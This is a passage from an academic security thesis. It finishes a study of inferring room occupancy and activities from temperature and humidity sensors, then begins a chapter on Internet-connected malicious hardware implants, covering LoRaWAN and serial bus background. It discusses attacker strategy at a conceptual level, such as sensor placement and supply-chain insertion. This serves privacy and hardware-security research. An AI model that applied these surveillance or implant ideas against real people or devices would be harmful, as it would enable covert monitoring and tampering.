Another interesting question is whether the availability of data from multiple sensors within a room can improve the prediction performance. To assess this question, we concatenated the feature vectors of two sensors prior to the classification. The evaluation process itself was kept identical to the previous analyses.
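Conceptually, the two-sensor setting only changes the input representation, as the following sketch illustrates; the feature matrices are placeholders for the per-window features of two sensors.

```python
# Sketch of the two-sensor setting: per window, the feature vectors of both
# sensors are concatenated before classification (placeholder feature matrices).
import numpy as np

rng = np.random.default_rng(0)
features_sensor_1 = rng.random((40, 6))   # 40 windows x 6 features from sensor 1
features_sensor_2 = rng.random((40, 6))   # same 40 windows, features from sensor 2
X_pair = np.hstack([features_sensor_1, features_sensor_2])
print(X_pair.shape)                        # (40, 12): combined feature vectors
```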

Table 3.5: Occupancy detection and estimation accuracies for two- and three-class tasks at Locations A and B based on two sensors.

Sensor Pair   0-1 Person? [%]       1-2 Persons? [%]       0-1-2 Persons? [%]
A1-A2         96.3 (+2.8 / +6.6)    60.8 (+13.1 / +13.0)   68.1 (+8.4 / +9.4)
A1-A3         93.9 (+0.4 / +9.7)    71.5 (+23.8 / +3.5)    75.7 (+16.0 / +9.3)
A1-A4         94.2 (+0.7 / +15.8)   56.6 (+8.9 / +8.4)     69.0 (+9.3 / +14.1)
A2-A3         90.1 (+0.4 / +5.9)    70.9 (+23.1 / +2.9)    74.5 (+15.8 / +8.1)
A2-A4         87.8 (−1.9 / +9.4)    53.7 (+5.9 / +5.5)     61.2 (+2.5 / +6.3)
A3-A4         84.8 (+0.6 / +6.4)    69.8 (+1.8 / +21.6)    70.6 (+4.2 / +15.7)
B1-B2         91.7 (+3.2 / +10.5)   72.0 (+4.4 / +11.3)    75.1 (+2.9 / +14.8)
B1-B3         89.6 (+1.1 / +22.8)   67.9 (+0.3 / +0.6)     71.7 (−0.5 / +15.1)
B2-B3         83.4 (+2.2 / +16.6)   61.4 (+0.7 / −5.9)     64.8 (+4.5 / +8.2)

The differences to the accuracies of the single sensors are given in parentheses. For example, the accuracy when measuring with Sensors A1 and A2 increases to 96.3%. When measuring with A1 only, the accuracy is 93.5% (cf. Table 3.3), which constitutes the difference of +2.8%. The difference to measuring with A2 only is +6.6%.

Table 3.5 shows the results for occupancy estimation using a pair of sensors. Overall, the detection accuracies improve by several percentage points when combining the feature vectors of two sensors. However, distinguishing between one and two persons in a room is still a hard task, with accuracies ranging approximately between 50% and 70%. The three-class problem also improves slightly, but by far the most reliable classification task remains determining whether there is a person in the room at all, with almost all accuracies now at 90% and above.


Table 3.6: Activity recognition accuracies for all three locations based on a single sensor and on two sensors.

One Sensor [%]
Sensor   Act.4   Act.3   Act.2   Act.2a   Act.2b
A1       56.8    81.0    82.6    57.5     96.3
A2       39.7    56.1    68.5    64.1     65.9
A3       32.7    47.2    66.7    60.3     68.7
A4       26.8    39.8    62.8    65.6     69.0
B1       55.1    76.0    75.6    63.4     71.5
B2       35.2    56.4    74.5    62.1     73.1
B3       33.3    39.5    63.9    50.9     62.2
C1       28.3    40.0    58.4    59.3     43.5
C2       25.8    41.7    60.0    71.6     55.3
C3       34.3    54.2    62.4    66.3     60.7
C4       25.1    36.8    62.6    66.1     53.3
C5       30.9    57.7    75.5    65.8     72.5

Two Sensors [%]
Sensor Pair   Act.4   Act.3   Act.2   Act.2a   Act.2b
A1-A2         50.2    75.4    83.1    74.8     91.0
A1-A3         50.1    76.7    80.4    72.4     88.3
A1-A4         54.5    79.0    83.0    67.3     89.4
A2-A3         32.6    50.0    65.9    74.8     67.1
A2-A4         41.1    55.1    71.0    75.5     69.1
A3-A4         31.1    43.8    68.3    75.3     46.8
B1-B2         52.7    77.0    80.0    70.1     86.0
B1-B3         55.6    74.5    76.4    64.2     79.6
B2-B3         39.3    54.5    72.1    59.8     62.7
C1-C2         29.5    46.8    55.8    65.2     62.5
C1-C3         38.8    52.5    60.2    63.8     76.9
C1-C4         28.6    44.6    67.8    64.4     53.3
C1-C5         36.6    52.4    68.5    64.1     65.4
C2-C3         32.2    52.5    62.4    76.5     72.8
C2-C4         29.0    48.9    64.5    77.3     59.3
C2-C5         30.5    49.3    72.3    75.5     67.1
C3-C4         40.2    54.7    67.9    72.4     69.7
C3-C5         42.4    60.5    70.9    74.7     77.4
C4-C5         35.3    57.1    72.6    72.4     64.5

Table 3.6 shows the results for activity recognition, for a single sensor (upper part) and for pairs of two sensors (lower part). Interestingly, the classification of activities appears to be a similarly hard task for pairs of sensors as it is for single sensors: using the information from multiple sensors does not substantially improve the results for activity classification. One reason might be that the information of multiple sensors is correlated for this task, such that adding a sensor only enlarges the feature space but does not add significant information. From a privacy perspective, however, this is somewhat reassuring: although the achieved accuracies are in almost all cases well above guessing chance, it is apparently not a straightforward task to accurately predict the activity of a person in the room.

3.5 Further Observations

Besides the accuracies on occupancy detection and estimation, as well as activity recognition, we made further observations that we present in this section.


3.5.1 Length of Measurement Windows

The length of the measurement windows influences the accuracy of detection. We evaluated window sizes in the range between 60 and 180 seconds. As an example, we analyzed the average accuracy of occupancy detection depending on the window size for all three locations. As shown in Figure 3.5, the accuracy increases with a longer window size. We achieved the best results with the longest window size of 180 seconds.

Figure 3.5: Average accuracy over all sensors from each location (Locations A, B, and C) for occupancy detection depending on the window size (60 to 180 seconds).

This indicates that the highest accuracies are possible if longer time periods are considered. From a practical perspective, it is not advisable to extend the window size much beyond a few minutes, since we assume that the performed activity is consistent for the whole duration of the window.
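A window-size sweep of this kind can be expressed as a simple loop over the same classification pipeline, as sketched below with placeholder features and labels; the real evaluation uses the features and splits of Section 3.3.5.

```python
# Sketch of the window-size sweep behind Figure 3.5: rerun the same classifier
# for several window lengths and compare average accuracies (placeholder data).
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB

rng = np.random.default_rng(1)
for window in (60, 90, 120, 150, 180):
    n_windows = 7200 // window                  # windows per 2-hour recording
    X = rng.random((n_windows, 6))              # per-window features (placeholder)
    y = rng.integers(0, 2, n_windows)           # occupancy labels (placeholder)
    acc = cross_val_score(GaussianNB(), X, y, cv=5).mean()
    print(window, round(100 * acc, 1))
```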

3.5.2 Selected Features

To assess the feasibility of an attacker who only has access to either temperature data or relative humidity data, we evaluated whether it might be enough to collect only one type of room climate data. In the classification process, an attacker derives a set of features from temperature and relative humidity data and selects the best-performing features for each sensor and classification goal automatically (cf. Section 3.3.5). Our analysis shows that features computed from temperature and relative humidity are of similar importance. In our evaluation, 57.9% of the selected features are derived from temperature measurements, and 52.3% from relative humidity measurements.3 We also compared the features in terms of differences between the three locations as well as differences between occupancy detection and activity recognition. In all these cases, there are no significant differences between the importance of temperature and relative humidity. An attacker restricted to either temperature or relative humidity data will perform worse than with both types of data.

3 Note that some features are based on both temperature and relative humidity, which is why the sum of both numbers exceeds 100%.


3.5.3 Size and Layout of Rooms

All our locations are office-like rooms, which have a similar layout (rectangular) but differ in size and furnishing. In our evaluation, the accuracy correlates with the size of the target location. As shown in Figure 3.5, we had the highest average accuracy in occupancy detection at Location C, which also has the smallest floor area of 13.9 m². Location A has a floor area of 16.5 m² and shows a slightly lower average accuracy. Location B is almost twice as large (30.8 m²) and shows the worst average accuracy of the three locations. Thus, our experiment indicates that an increasing room size leads, on average, to a decreasing accuracy. An attacker therefore achieves higher accuracies by monitoring small target locations than by monitoring larger ones.

3.5.4 Position of Sensors

According to our threat model in Section 3.2, the attacker controls the target location's layout. Thus, we assume an attacker who can decide where to install room climate sensors in the target location, and we consider how the position of a room climate sensor influences the accuracy of the derived information. For occupancy detection, we had the best accuracy with a sensor node located at the center of the ceiling of the target location (Sensors A1, B1, C1). In this position, the sensor covers the largest area for measuring the climate of the room. Sensors mounted to the walls or placed on shelves perform differently in our experiments. For occupancy estimation, the best sensors differ per location, i.e., the wall-mounted Sensor A3 outperforms all others at Location A, whereas B3 (similar to A3) and B1 are almost on par. For activity recognition, the central sensor nodes performed best at Locations A and B, but not at Location C. From the attacker's perspective, the best position to deploy a room climate sensor is at the ceiling in the center of the target location. In large rooms, multiple sensors could be installed at the ceiling, each covering a subsection of the room.

3.6 Discussion

As our experiments reveal, knowing the temperature and relative humidity of a room allows an attacker to detect the presence of people and to recognize certain activities with a significantly higher probability than guessing. By evaluating temperature and relative humidity curves with a length of 180 seconds, we were able to detect the presence of an occupant in one of our experimental spaces with an accuracy of 93.5% using a single sensor. The occupancy estimation results show no definitive trend: three out of four sensors perform around guessing chance for deciding between one or two persons, yet the best accuracies range around 68%. The classification accuracies for the three-class problem, deciding between zero, one, and two persons being present, consequently lie between the occupancy detection and the one-vs-two-persons results, with 72.2% as the best result. In terms of activity recognition, we distinguished between four activities with an accuracy of up to 56.8%, between three activities with up to 81.0%, and between two activities with up to 95.1%. Thus, an attacker focusing on the detection of a specific activity is more successful than an attacker who aims to classify a broader variety of activities. In the following, we discuss implications and limitations of our results.

3.6.1 Privacy Implications

We show that an attacker might be able to infer life and work habits of the occupants from the room climate data. In particular, the attacker is able to distinguish between sitting, standing, and moving, which already might reveal the position and activities of the occupant in the room. Moreover, the attacker can distinguish between upright and sedentary activities, between moving and standing, and between working on a laptop and reading a book. Given the limited amount of recorded sensor data, the achieved accuracies in occupancy detection and activity recognition give a clear indication that occupants are subject to privacy violations according to the threat model described in Section 3.2. However, occupancy estimation and activity recognition are less straightforward: the accuracies achieved for occupancy estimation are low, and those for activity recognition differ between sensor positions and locations. On the bright side, it is also reassuring that simply increasing the number of sensors is not as ominous as one might fear, since the relative accuracy increase is rather slim. In other words, the most restrictive scenario, i.e., one deployed sensor, is already sufficient. Hence, for an attacker, the benefit of deploying and exploiting more than one sensor is at least questionable. Further experiments are required for a better assessment of the privacy risks induced by room climate data. Our work provides promising directions for these assessments. For example, we demonstrated the existence of the information leak with the Naïve Bayes classifier, arguably one of the simplest machine learning classifiers. In future work, it would be interesting to explore upper bounds for the detection of presence/absence, occupancy estimation, and different activities by using more advanced classifiers, such as the recently popular deep learning algorithms.

3.6.2 Location-Independent Classification

An important question is whether it is possible to perform location-independent classification, i.e., to train the classifier with sensor data of one location and then use it to classify sensor data of a target location that is not similar to the training location in size, layout, and sensor positions. If this were possible, the service providers of smart heating applications would be able to detect occupancy and to recognize activities without having access to the target locations. According to their privacy statements, popular smart thermostats from Nest [220], Ecobee [71], and Honeywell [129] send measured climate data to the service providers' databases.


To evaluate these privacy threats, we used the room climate data of the best-performing sensor of one location as the training data set for the other locations. For example, to classify events of an arbitrary sensor of Location A, we trained the classifier with room climate data collected by Sensor B1 or Sensor C1. We obtained statistically significant results for a few combinations in occupancy detection, but the majority of our occupancy detection results were not significant. Since discriminating between one and two persons had already proved unreliable, occupancy estimation was excluded. For activity recognition, we were not able to obtain statistically significant results. However, the possibility of location-independent attackers cannot be excluded: the absence of significant results in our experiments may be merely due to the limited amount of data. Future studies should gather data from various rooms up to a point where the combined results hold for arbitrary locations. Having more data from a multitude of rooms available would help the machine learning classifiers to recognize and ignore data characteristics that are specific to individual experimental rooms. Consequently, the algorithms could better identify the distinct data characteristics of the different classes in occupancy detection and activity recognition. This would enable location-independent classification of room climate data, in which the training location is not similar to the target location regarding size, layout, furnishing, and positions of the sensors.
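The location-independent setting differs from the previous experiments only in how training and test data are paired, as the following sketch shows; the feature matrices and labels are placeholders for the windowed room climate features.

```python
# Sketch of the location-independent evaluation: train on the best sensor of
# one location, test on a sensor of a different location (placeholder data).
import numpy as np
from sklearn.naive_bayes import GaussianNB

rng = np.random.default_rng(2)
X_train, y_train = rng.random((200, 6)), rng.integers(0, 2, 200)  # e.g., Sensor B1
X_test, y_test = rng.random((80, 6)), rng.integers(0, 2, 80)      # e.g., a sensor at Location A

clf = GaussianNB().fit(X_train, y_train)
print((clf.predict(X_test) == y_test).mean())   # cross-location accuracy
```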

3.6.3 Policy Implications

In a representative smart home survey of German consumers from 2015, 34% of the participants stated that they are interested in technologies for intelligent heating or are planning to acquire such a system [61]. Another survey with 1,000 US and 600 Canadian consumers found that for 72% of them, the most desired smart home device would be a self-adjusting thermostat, and 37% reported that they were likely to purchase one in the next 12 months [135]. Sharing smart home data with providers and third parties is a popular idea and, at the same time, a controversial issue for consumers. In a recent representative survey with 461 American adults by Pew Research [240], the participants were presented with a scenario of installing a smart thermostat "in return for sharing data about some of the basic activities that take place in your house like when people are there and when they move from room to room". Of all respondents, 55% said that this scenario was not acceptable for them, 27% said that it was acceptable, with the remaining 17% answering "it depends". Furthermore, in a worldwide survey with 9,000 respondents from nine countries (Australia, Brazil, Canada, France, Germany, India, Mexico, the UK, and the US), 54% of respondents said that "they might be willing to share their personal data collected from their smart home with companies in exchange for money" [138].4 We think that the idea of sharing smart home data for various benefits will continue to be intensively discussed in the future, and therefore, consumers and policy makers should be made aware of the level of detail inferable from smart home data.

4 Methodological details, such as representativeness, breakdown by country and the exact formulation of the questions, are not known about this survey.

Which rewards are actually beneficial for consumers? Moreover, which kinds of data sharing are ethically permissible? Only by answering these questions will it be possible to design fair policies and establish beneficial personal data markets [276]. In this work, we take a first step towards informing policy for the smart heating scenario.

3.7 Related Work on Occupancy Detection and Activity Recognition

Over the last decade, several experiments have been conducted to detect occupancy in sensor-equipped spaces and to recognize people's activities, as summarized in Table 3.7. Activity recognition has been considered for basic activities, such as leaving or arriving at home, or sleeping [187], as well as for more detailed views, including toileting, showering, and eating [296]. Most of the previous research uses types of sensors that are different from temperature and relative humidity. For example, CO2 represents a useful source for occupancy detection and estimation [314]. Additionally, sensors detecting motion based on passive infrared (PIR) [5, 65, 114, 168, 117, 324, 81, 277, 47, 233], sound [73, 114, 102, 233], barometric pressure [195], and door switches [69, 70, 320, 81, 200, 277, 47] are utilized for occupancy estimation. For evaluation, different machine learning techniques are used, e.g., HMM [314, 81], ARHMM [117], ANN [73, 200], Naïve Bayes [338], and decision trees [114, 320, 102, 38, 338, 81]. In contrast to previous work, our results rely exclusively on temperature5 and relative humidity. Previously published experimental results involved other or additional types of sensors, such as CO2, acoustics, motion, or lighting (the latter three are referred to as AML in Table 3.7), door switches, or states of appliances (also gathered with the help of switches), such as water taps or WC flushes. For this reason, our detection results are not directly comparable to these works.

3.8 Conclusion

We investigated the common belief that data collected by room climate sensors divulges private information about the occupants. To this end, we conducted experiments aiming to reflect realistic conditions, i.e., considering an attacker who has access to typical room climate data (temperature and relative humidity) only. Our experiments revealed that knowing a sequence of temperature and relative humidity measurements already allows an attacker to detect the presence of people and to recognize certain activities with high accuracy. In contrast, the distinction between the presence of one or two persons is evidently harder, while using data from two different sensors slightly improves occupancy detection, but activity recognition remains a hard task.

5 Note that in [38], additional classification results using temperature as the only predictor are reported in the range of 67% to 87%. The underlying distribution of absence (79%, 64%, and 79%) and presence (21%, 36%, and 21%) in their three datasets is unbalanced and, thus, may have biased the classifier.


Table 3.7: Overview of previous experiments on occupancy detection, occupancy estimation, and activity recognition with a focus on selected sensors (sensor categories considered: temperature, relative humidity, CO2, AML, switches, ventilation, wearables).

Work                                    Target
van Kasteren et al., 2008 [296]         A
Lam et al., 2009 [168]                  E
Dong et al., 2010 [65]                  E
Lu et al., 2010 [187]                   A
Hailemariam et al., 2011 [114]          D
Han et al., 2012 [117]                  E
Zhang et al., 2012 [324]                E
Ekwevugbe et al., 2013 [73]             E
Ebadat et al., 2013 [69]                E
Ai et al., 2014 [5]                     E
Wörner et al., 2014 [314]               D
Yang et al., 2014 [320]                 D/E
Masood et al., 2015 [195]               E
Ebadat et al., 2015 [70]                E
Candanedo & Feldheim, 2016 [38]         D
Mehr et al., 2016 [200]                 A
Sprint et al., 2016 [277]               A
Cicirelli et al., 2016 [47]             A
Pedersen et al., 2017 [233]             D
Fan et al., 2017 [81]                   A
Ghaffarzadegan et al., 2017 [102]       D/E
Zimmermann et al., 2017 [338]           D/E
This work                               D/E/A

Notation: 'D' - occupancy detection, 'E' - occupancy estimation, 'A' - activity recognition, 'AML' - acoustic, motion, and lighting sensors

Nonetheless, our results confirm that the need for protection of room climate data is justified: the leakage of such 'inconspicuous' sensor data as temperature and relative humidity can seriously violate privacy in smart spaces. Future work is required to determine the level of privacy invasion in more depth and to develop appropriate countermeasures.

Chapter 4

Malicious IoT Implants

The infrastructure of the IoT provides connectivity for billions of Internet-connected devices all over the world. New threats arise with this interconnectivity as attackers could try to misuse the capabilities of the IoT infrastructure. In this chapter, we present a case study on the threat of connectivity misuse that leverages public IoT infrastructures as a communication channel to control malicious hardware elements over the Internet.

Contents

4.1 Introduction
4.2 Preliminaries
    4.2.1 LPWAN Infrastructure
    4.2.2 Serial Communication
    4.2.3 I2C Communication Protocol
4.3 Threat Model
    4.3.1 Untrusted Supply Chain
    4.3.2 Attacker Model
4.4 Malicious IoT Implant
    4.4.1 Design Criteria
    4.4.2 Attack Procedures
    4.4.3 Implementation
4.5 Evaluation
    4.5.1 Dimensions
    4.5.2 Power Consumption
    4.5.3 Wireless Range
    4.5.4 Cost
    4.5.5 Effort of Insertion
    4.5.6 Feasibility of Attacks
4.6 Discussion
    4.6.1 Limitations
    4.6.2 Countermeasures
4.7 Related Work on Malicious Hardware
4.8 Conclusion


4.1 Introduction

According to a recent estimation [99], 20.4 billion IoT devices will be installed by the end of 2020. These devices are connected in mostly wireless and local networks all over the world, together comprising a global IoT infrastructure. In the past, security concerns have been expressed regarding this powerful IoT infrastructure: Besides security issues in IoT devices [192, 248], IoT networks [213], and IoT applications [91], the force of these billions of devices can be weaponized for targeted attacks with impactful consequences. Examples are recent denial-of-service (DoS) attacks on Internet infrastructure [12, 157], in which attacker-controlled IoT nodes utilize existing IoT infrastructure to build large botnets. In this chapter, we explore a new threat where the connectivity of low-power wide-area networks (LPWANs) is leveraged as a communication channel to control malicious hardware. Our objective is to prove that public IoT infrastructure can be used to perform attacks at the hardware level remotely, even if the target device does not feature a network interface. The underlying threat of malicious hardware arises from an untrusted supply chain, in which electronic products are manufactured and shipped in large volumes. The global supply chain of electronic products consists of a number of sequential steps, from the design of a new product over the fabrication process and distribution to the installation. Hereby, we focus on the physical distribution process that involves entities such as manufacturers, third-party logistics providers, distributors, retailers, and customers. In addition, government agencies oversee the flow of goods at borders for legal and documentation purposes. Thus, an electronic product can be physically accessed and manipulated by a number of entities during distribution. These entities could be potential attackers or cooperate with an attacker, and therefore the integrity of an electronic product should not be assumed in general. This contradicts the inherent trust of consumers that new products have not been tampered with. Inspired by the leaked NSA ANT catalog [13], we experiment with the insertion of additional hardware, referred to as hardware implants, into an existing electronic system after the fabrication process. Although the threat of hardware implants seems to be acknowledged by the academic security community, previous research on malicious hardware has mainly focused on hardware trojans, i.e., diverse types of malicious hardware inserted during the design phase [4, 90, 106, 124, 154, 181] and the fabrication phase [24, 267, 318], but not during the distribution phase. As our major contribution in this work, we comprehensively explore a new attack vector: malicious IoT implants. We show that IoT infrastructures can be abused for malicious purposes other than DoS attacks. Although the existence of hardware implants is known [13], we are the first in the scientific community to design and build a malicious IoT implant, a low-cost electronic implant that connects to the Internet over IoT infrastructure. The feasibility of this threat is demonstrated by inserting the implant into exemplary safety- and security-critical target devices. We describe the process of insertion in detail and evaluate real-world constraints such as size, cost, and energy consumption. Finally, we suggest and discuss a number of potential countermeasures.


Furthermore, we investigate new vulnerabilities at the hardware level that exploit insecurities in serial communication on printed circuit boards (PCBs). We start by identifying the de-facto serial communication standards through an analysis of over 11,000 microcontroller (MCU) models. Then, we show that serial communication is vulnerable to malicious IoT implants. For our implementation that focuses on the widely adopted I2C standard, we introduce four attack procedures in which our implant directly interferes with the communication on I2C buses. At the end, we discuss the adaptation of these attacks to other serial communication standards. The presented threat is not considered in current threat models for hardware security [250], which mainly cover hardware trojans, side-channel attacks, reverse engineering, piracy of intellectual property, and counterfeiting. Also, guidelines on supply chain risks, such as NIST SP 800-161 [31], consider malicious software insertion but not malicious hardware insertion. Thus, the goal of this chapter is to demonstrate and understand the feasibility of Internet-connected hardware implants and their effects on the security of arbitrary target devices, and to raise awareness for this novel threat. The remainder of this chapter is organized as follows: In Section 4.2, we provide an overview of LPWAN infrastructure and serial communication. In Section 4.3, we present the underlying threat model. In Section 4.4, we outline the design and implementation of the malicious hardware implant, and we describe the results of the evaluation in Section 4.5. In Section 4.6, we discuss the results and outline countermeasures as well as limitations. Related work on malicious hardware is presented in Section 4.7. The chapter concludes in Section 4.8.

4.2 Preliminaries

In this section, we present preliminaries on LPWAN infrastructure and serial communication, and introduce the I2C communication protocol.

4.2.1 LPWAN Infrastructure

The global IoT infrastructure is split into millions of local networks that are interconnected via the Internet. From an application perspective, these networks can be categorized into body-area, personal-area, local-area, and wide-area networks. In this chapter, we focus on LPWANs, which provide connectivity for thousands of IoT nodes across large geographical areas, as their wireless range competes with the ranges of mobile telephony networks. In contrast to mobile telephony networks that support high data rates and bandwidths, LPWANs are specifically designed for low-power machine-to-machine (M2M) applications that communicate at low data rates. As of June 2018, a popular LPWAN technology with deployments in over 100 countries is LoRa [185]. LoRa operates in three frequency bands (433/868/915 MHz) at different channels and bandwidths, and uses a chirp spread spectrum modulation scheme that provides a high resistance against wireless interference.

These advanced propagation properties allow transmissions of wireless data over distances of up to a few kilometers. The specifications of LoRaWAN, the LoRa network protocol, are maintained by the LoRa Alliance, a global non-profit organization consisting of more than 500 member companies [184]. From a network perspective, LoRaWAN utilizes a star-of-stars architecture, in which so-called gateways relay messages either between IoT nodes or from an IoT node to the central network server and vice versa. The wireless transmissions between IoT nodes and the gateway are based on the LoRa technology, while the Internet Protocol (IP) is used for data transfers between gateways and the central network server. The cost of deploying LPWANs is significantly lower than the roll-out of mobile telephony networks, such that even non-profit initiatives are able to provide network coverage for entire cities and regions. A prominent example is The Things Network (TTN), a crowdsourced initiative that claims to have a fast-growing community with over 42,000 people in more than 80 countries. The TTN community deploys LoRaWAN gateways worldwide to achieve its objective of enabling a global network for IoT applications without subscription costs. According to TTN, 10 gateways are enough to cover a major city like Amsterdam with wireless connectivity for IoT applications. Currently, almost 4,000 TTN gateways are deployed globally. Besides non-profit initiatives, the roll-out of nationwide LPWANs driven by telecommunication companies is ongoing in many countries, e.g., India [151], Australia [244], and the USA [271]. According to a forecast [190], LPWANs will supersede mobile telephony networks in providing wireless connectivity for IoT applications by 2023.

4.2.2 Serial Communication

Although electronic products provide a large diversity in function, features, and appearance, their underlying hardware platforms follow similar design principles. Typically, the hardware platform consists of a number of integrated circuits (ICs) that are mounted on PCBs and interconnected via on-board communication interfaces. An IC is a set of electronic circuits that are inseparably and electronically interconnected as one electronic element, often referred to as a chip. From a high-level perspective, there exist three types of ICs: analog, digital, and mixed signal. Digital ICs process binary signals and are typically microcontrollers (MCUs), memory chips, or digital signal processors (DSPs). In contrast, analog ICs process continuous signals to enable functions such as amplification, demodulation, and filtering of electronic signals. Examples of analog ICs are sensors, amplifiers, and power management circuits. Mixed-signal ICs consist of both digital and analog circuits. Applications are, for example, the conversion of digital to analog signals and vice versa, denoted as D/A and A/D converters. A typical PCB comprises multiple sensors and actuators. Generally, one or more MCUs are present to process the data received from the sensors, as well as memory chips to store data persistently, and network interfaces to communicate with external entities.


A number of serial and parallel data transmission mechanisms exist for the communication between ICs. In parallel communication, multiple bits are transmitted simultaneously over multiple communication channels. In contrast, in serial communication, bits are sent sequentially over a single communication channel. Since the cost of ICs is also determined by the number of input and output pins, ICs on PCBs often use serial communication to interact with each other. Serial communication mechanisms can be categorized into synchronous and asynchronous systems. Synchronous systems associate a clock signal with the data signals, which is shared by all bus participants. In asynchronous systems, the data signals are transmitted without a shared clock signal. Most serial communication systems comprise a hierarchy of master and slave ICs. MCUs are typically masters: they control the communication and command slaves, e.g., memory and sensors, to send data or to execute particular tasks. To determine the most important serial communication interfaces on PCBs, we performed a parametric search on the product databases of six leading MCU suppliers: NXP, Renesas, Microchip, STMicroelectronics (STM), Infineon, and Texas Instruments (TI). In 2016, these suppliers had a combined market share of 72% of all sold MCUs based on revenue [134]. We analyzed more than 11,000 MCU models regarding their serial communication interfaces and found that 86.7% have a UART interface, 83.5% support I2C, and 63.8% SPI. We also analyzed the support for further serial communication interfaces, such as CAN (34.3%), USB (30.2%), and Ethernet (11.5%), which are mainly application-specific and not as widely supported as SPI, I2C, and UART. A detailed analysis can be found in Table 4.1. Although the support of a serial interface is no guarantee that this interface is actually used in a product that features this MCU, these numbers indicate the de-facto standards that are supported by leading MCU suppliers. Table 4.2 shows a comprehensive overview of the most important on-board serial communication interfaces, which we introduce in more detail below.
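The interface-support shares above are simple aggregations over the collected MCU models. The following sketch illustrates the kind of computation involved, using a tiny placeholder data set instead of the actual supplier databases:

```python
# Illustrative aggregation behind Table 4.1: share of MCU models supporting each
# serial interface, overall and by bit size (placeholder rows only).
import pandas as pd

mcus = pd.DataFrame({
    "supplier": ["NXP", "STM", "TI", "Renesas"],
    "bit":      [32, 32, 16, 8],
    "uart":     [True, True, True, True],
    "i2c":      [True, True, True, False],
    "spi":      [True, True, True, False],
})
print((mcus[["uart", "i2c", "spi"]].mean() * 100).round(1))        # overall support [%]
print(mcus.groupby("bit")[["uart", "i2c", "spi"]].mean() * 100)    # breakdown by bit size
```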

UART. The Universal Asynchronous Receiver/Transmitter (UART) is a serial communication interface that uses two data signals: one for receiving and another one for transmitting. The communicating parties have to agree on the data rate and are synchronized via a start bit. UART supports full-duplex communication, which means that data can be transmitted in both directions simultaneously. UART's main use case is the communication with external hardware components via cables. In contrast, SPI and I2C are used for the communication of peripheral devices on the same circuit board, and thus for shorter distances.

I2C. The Inter-Integrated Circuit (I2C) bus [222], also known as 2-Wire Interface (TWI), was designed by Philips Semiconductors in 1982 with the objective of providing a simple communication mechanism between ICs on a PCB. The original specifications from 1982 allow 100 kHz communication, use 7-bit addresses, and limit the number of devices per bus to 112 (as a number of addresses is reserved). I2C requires two signal lines, data and clock, and allows half-duplex communication, i.e., data can be transmitted in both directions but not at the same time. Compared to other serial buses, I2C includes a communication protocol that allows masters to communicate with slaves in a coordinated way. I2C is well suited for general-purpose communication and for electronic products comprising a number of ICs that communicate with each other.


Table 4.1: Number of MCU models sorted by supplier and product family (as of January 2018). If a database entry of an MCU model had no parameter regarding a certain interface, we assume that this interface is not supported.

                                                  #MCUs that support
Supplier     MS    Family        Bit   #MCUs    UART    I2C    SPI    CAN    USB    ETH
NXP          19%   i.MX          32      251     243    243    243    219    243    220
                   Kinetis       32      928     812    812    812    264    334     72
                   LPC           32      540     534    531    482    228    276    136
                   MPC           32      762       0    290     94    475      0      0
                   S32           32       17      17      6      1      7      0      0
                   VF            32       35      34     34     34     34      0      0
Renesas      16%   Various        8      566     550    354      3     36      1      0
                   Various       16    2,358   2,304  2,226    485    340     72      0
                   Various       32    2,318   2,313  2,069  1,924  1,441  1,298    585
Microchip    14%   AVR            8       49      39     43     45      0      5      0
                   PIC            8      116     106    104    104      0      0      0
                   PIC           16      366     366    366    366      0     58      0
                   PIC           32      241     241    220    241      0    175      0
                   SAM           32      255     255    255    255      0    187      0
STM          10%   STM8           8      137      30     42     33     21      0      0
                   STM32         32      799     799    796    794    490    598    167
Infineon      7%   Various        8      140     140     16    135      0      0      0
                   Various       16      156     156     93    145     88      0      0
                   Various       32      308     205    189    206     29     14     11
TI            6%   MSP430        16      536     471    446    500      0      0      0
                   DRA           32       28      28     28     28     28     18     25
                   DSP           32      175      67     72     54      0     54     48
                   Performance   32      254     124    235    248    170     60      0
                   Sitara        32       43      25     26     26     20     26     37
                   TDA           32       12      12     12     12     12      8     12

By bit size         8:   1,008 (8.8%)     865 (85.8%)    559 (55.5%)    320 (31.7%)     57 (5.7%)      14 (1.4%)       0 (0%)
                   16:   3,416 (30.0%)  3,297 (96.5%)  3,131 (91.7%)  1,496 (43.8%)    428 (12.5%)    130 (3.8%)       0 (0%)
                   32:   6,966 (61.2%)  5,709 (81.9%)  5,818 (83.5%)  5,454 (78.3%)  3,417 (49.1%)  3,291 (47.3%)  1,313 (18.9%)
In sum                  11,390 (100.0%) 9,871 (86.7%)  9,508 (83.5%)  7,270 (63.8%)  3,902 (34.3%)  3,435 (30.2%)  1,313 (11.5%)

Notation: 'MS' - market share of MCU sales by revenue in 2016, 'Family' - MCU product family as advertised by the supplier (if applicable), 'Bit' - bit size of the MCU architecture, '#MCUs' - number of MCU models, 'ETH' - Ethernet.

Table 4.2: Comparison of serial communication systems.

Bus system   Signal Lines   Synchronous   Asynchronous   Half Duplex   Full Duplex   Multi-Master   Protocol
UART         2              -             yes            -             yes           -              -
I2C          2              yes           -              yes           -             yes            yes
SPI          3+             yes           -              -             yes           -              -

SPI. The Serial Peripheral Interface (SPI) is a serial communication system that uses at least three signals: two data signals and a clock. If the master controls more than one slave, then an additional selection signal is required for each slave. SPI is used for full-duplex data transfers that reach data rates of up to 1 Mbit/s. The main drawback of SPI is the number of signal lines, which increases linearly with the number of slaves: each additional slave requires a dedicated select signal line, which in turn requires additional I/O pins at the master IC and adds challenges in placing the signal lines on the PCB. Another drawback is the limitation to only one master. Thus, SPI is well suited for cases in which a single master is connected to one or two slaves and a high data rate in both directions is required.
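The wiring overhead mentioned above can be made explicit with a small comparison; the helper functions below are illustrative only and simply restate the pin counts discussed in the text.

```python
# Small illustration of the wiring drawback: SPI needs one chip-select line per
# slave in addition to its two data signals and the clock, whereas I2C always
# uses the same two shared lines (SDA, SCL).
def spi_signal_lines(n_slaves: int) -> int:
    return 3 + n_slaves      # two data signals + clock + one select line per slave

def i2c_signal_lines(n_slaves: int) -> int:
    return 2                 # SDA + SCL, shared by all bus participants

for n in (1, 4, 8):
    print(n, "slaves:", spi_signal_lines(n), "SPI lines vs.", i2c_signal_lines(n), "I2C lines")
```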

4.2.3 I2C Communication Protocol

